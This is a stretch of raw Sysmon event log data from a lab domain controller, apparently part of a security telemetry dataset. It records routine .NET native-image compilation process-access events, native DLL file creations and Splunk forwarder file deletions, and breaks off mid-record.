21:03:35.003{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3603-00000000CF01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.987{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3603-00000000CF01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.987{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3603-00000000CF01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.940{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4603-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.925{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4603-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.925{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4603-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.769{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=420B693452761167FB4C143FC9EB1C77,SHA256=80A56FDF7576A037130DED8C4A4CFA19EE29E4396980C8BADCB13828BB9BA45A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.550{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4503-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.534{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4503-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.534{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4503-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.425{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4403-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.409{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4403-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.409{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4403-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.347{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4303-00000000CF01}584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.331{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4303-00000000CF01}584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.331{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4303-00000000CF01}584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:36.315{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b94-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-06-23 21:03:36.315 10341000x800000000000000020160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.175{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.175{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.128{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4103-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.128{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E14CD5CFC78D89455F496112E646C23,SHA256=BB8B1F6DBE506E6CF2A3FE564E4137C42DECAE32286A0A0D2A606D9E9B002C35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.112{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4103-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.112{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4103-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:36.097{4DB9351A-A1A7-60D3-4003-00000000CF01}6724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a44-0\Microsoft.ActiveDirectory.TRLParser.dll2021-06-23 21:03:36.097 23542300x800000000000000020185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.940{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38D840185DAAF35E5CCD3573E8913D4A,SHA256=63ABA053485595C88B1DA574E7B7573B946B415B06AE40AD34D0A7059F37C795,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 